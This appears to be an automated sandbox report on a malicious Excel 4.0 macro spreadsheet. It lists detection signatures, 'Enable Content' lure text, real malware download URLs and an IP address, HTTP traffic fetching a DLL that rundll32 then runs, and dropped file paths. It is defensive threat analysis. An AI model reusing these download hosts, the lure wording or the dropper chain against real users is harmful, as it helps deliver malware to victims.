Windows Analysis Report sin t#U00edtulo_0212.xlsm

Overview

General Information

Sample Name: sin t#U00edtulo_0212.xlsm
Analysis ID: 532947
MD5: 382f6c1c7508996537bfd33fc5e884af
SHA1: 5143a3cce279c8e70c7a2aa366a78b2583de9025
SHA256: 5d0311243534a50b4fffa6bb32a952f86e51194d372741b30dbea12c51eb4c44
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: sin t#U00edtulo_0212.xlsm Virustotal: Detection: 22% Perma Link
Antivirus detection for URL or domain
Source: http://www.duoyuhudong.cn/wp-content/we8xi/ooC: Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/T Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/R Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/ Avira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B531 FindFirstFileExA, 3_2_6E46B531

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: Z8LJs4fFM8[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sadabahar.com.np
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.8.1Date: Thu, 02 Dec 2021 20:22:20 GMTContent-Type: application/x-msdownloadContent-Length: 460288Connection: keep-aliveX-Powered-By: PHP/7.2.15Set-Cookie: 61a92afcad18b=1638476540; expires=Thu, 02-Dec-2021 20:23:20 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Thu, 02 Dec 2021 20:22:20 GMTExpires: Thu, 02 Dec 2021 20:22:20 GMTContent-Disposition: attachment; filename="Z8LJs4fFM8.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 0d e9 1a ec 6c 87 49 ec 6c 87 49 ec 6c 87 49 9f 0e 84 48 e1 6c 87 49 9f 0e 82 48 71 6c 87 49 9f 0e 83 48 fa 6c 87 49 be 19 82 48 bf 6c 87 49 be 19 83 48 fc 6c 87 49 be 19 84 48 fb 6c 87 49 9f 0e 81 48 ef 6c 87 49 9f 0e 86 48 fd 6c 87 49 ec 6c 86 49 37 6c 87 49 59 19 8e 48 e3 6c 87 49 59 19 87 48 ed 6c 87 49 59 19 78 49 ed 6c 87 49 ec 6c 10 49 ed 6c 87 49 59 19 85 48 ed 6c 87 49 52 69 63 68 ec 6c 87 49 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 66 ff a8 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 76 03 00 00 9a 03 00 00 00 00 00 4e 4b 01 00 00 10 00 00 00 90 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 07 00 00 04 00 00 a1 2d 07 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 91 04 00 a0 08 00 00 50 9a 04 00 b4 00 00 00 00 e0 04 00 48 2a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 56 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 03 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 75 03 00 00 10 00 00 00 76 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 1a 01 00 00 90 03 00 00 1c 01 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 23 00 00 00 b0 04 00 00 16 00 00 00 96 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 2a 02 00 00 e0 04 00 00 2c 02 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 2c 00 00 00 10 07 00 00 2e 00 00 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 20:22:19 GMTserver: LiteSpeedData Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87
Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/l equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.761699674.000000000598F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537570017.000000000598F000.00000004.00000001.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/
Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.763362323.00000000078B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.763353530.0000000007886000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/R
Source: EXCEL.EXE, 00000000.00000002.759328902.0000000004E87000.00000004.00000001.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/T
Source: EXCEL.EXE, 00000000.00000002.750052025.000000000051C000.00000004.00000020.sdmp String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/ooC:
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30817388.png Jump to behavior
Source: unknown DNS traffic detected: queries for: sadabahar.com.np
Source: global traffic HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E445E70 GetOpenClipboardWindow,GetDesktopWindow,GetCurrentThreadId,GetUserDefaultUILanguage,GetProcessWindowStation,GetUserDefaultUILanguage,GetEnvironmentStringsW,GetProcessWindowStation, 3_2_6E445E70

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4 Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4 Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1 Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" button
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx Jump to dropped file
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\ Jump to behavior
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 0_2_024E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6340 0_2_024E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6753 0_2_024E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E66E8 0_2_024E66E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E66F3 0_2_024E66F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018562B 3_2_0018562B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E05C 3_2_0019E05C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018601A 3_2_0018601A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00191E11 3_2_00191E11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00199209 3_2_00199209
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C400 3_2_0019C400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AC3D 3_2_0019AC3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019EC30 3_2_0019EC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019CE32 3_2_0019CE32
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A833 3_2_0018A833
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193C28 3_2_00193C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A02A 3_2_0018A02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018C227 3_2_0018C227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198851 3_2_00198851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00194E55 3_2_00194E55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019D454 3_2_0019D454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018F443 3_2_0018F443
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C879 3_2_0019C879
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001A0E72 3_2_001A0E72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00184871 3_2_00184871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00196A6B 3_2_00196A6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00190660 3_2_00190660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001A1E60 3_2_001A1E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019988A 3_2_0019988A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019D88A 3_2_0019D88A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195C8A 3_2_00195C8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00189082 3_2_00189082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019B2B8 3_2_0019B2B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001940BB 3_2_001940BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001922BB 3_2_001922BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00191ABD 3_2_00191ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00190AA8 3_2_00190AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B0AC 3_2_0018B0AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193AA0 3_2_00193AA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019C6D9 3_2_0019C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001970D1 3_2_001970D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018E6CA 3_2_0018E6CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B8CA 3_2_0018B8CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195ECA 3_2_00195ECA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018D2C4 3_2_0018D2C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00181EC4 3_2_00181EC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001956F8 3_2_001956F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AAF3 3_2_0019AAF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001868F2 3_2_001868F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001876EE 3_2_001876EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E31F 3_2_0019E31F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00181914 3_2_00181914
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018610E 3_2_0018610E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00197900 3_2_00197900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198103 3_2_00198103
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00193158 3_2_00193158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B354 3_2_0018B354
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E554 3_2_0019E554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019DD54 3_2_0019DD54
